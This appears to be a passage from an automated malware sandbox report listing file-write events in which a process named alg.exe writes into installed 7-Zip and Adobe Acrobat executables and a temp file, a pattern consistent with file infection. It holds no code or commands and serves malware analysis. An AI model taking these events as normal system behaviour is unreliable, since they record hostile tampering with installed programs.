Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 382726	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Users\user\AppData\Local\Temp\aut8C49.tmp offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Users\user\AppData\Local\Temp\aut8C49.tmp offset: 952832	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Users\user\AppData\Local\Temp\aut8C49.tmp offset: 1526348	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Users\user\AppData\Local\Temp\aut8C49.tmp offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Users\user\AppData\Local\Temp\aut8C49.tmp offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Users\user\AppData\Local\Temp\aut8C49.tmp offset: 1526272	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Users\user\AppData\Local\Temp\aut8C49.tmp offset: 614020	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Users\user\AppData\Local\Temp\aut8C49.tmp offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 700416	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 1273932	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 1273856	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 464916	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 14848	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 588364	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 588288	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 5610	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 5630464	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 6203980	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 6203904	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 3201596	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 27136	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 600652	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 600576	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 8988	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 31744	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 605260	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 605184	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 12684	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 3571200	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 4144716	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 4144640	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 1485948	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59362816	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59936332	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59936256	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 140924	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 3571200	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 4144716	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 4144640	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 1485948	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59362816	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59936332	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59936256	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 140924	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 50176	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 623692	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 623616	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 24668	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 328192	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 901708	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 901632	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 4988	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 642048	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 1215564	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 1215488	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 132252	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 11459072	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 12032588	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 12032512	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 4630732	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 192512	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 766028	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 765952	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 95345	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 759296	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 1332812	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 1332736	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 285633	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 385536	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 959052	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 958976	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 182364	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 123904	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 697420	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 697344	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 66716	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1102848	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1676364	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1676288	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 753617	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 2531840	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 3105356	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 3105280	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 1150992	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 459776	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 1033292	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 1033216	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 209348	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 99840	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 673356	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 673280	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 69527	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 256512	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 830028	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 829952	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 72028	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 521216	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 1094732	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 1094656	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 321696	Jump to behavior
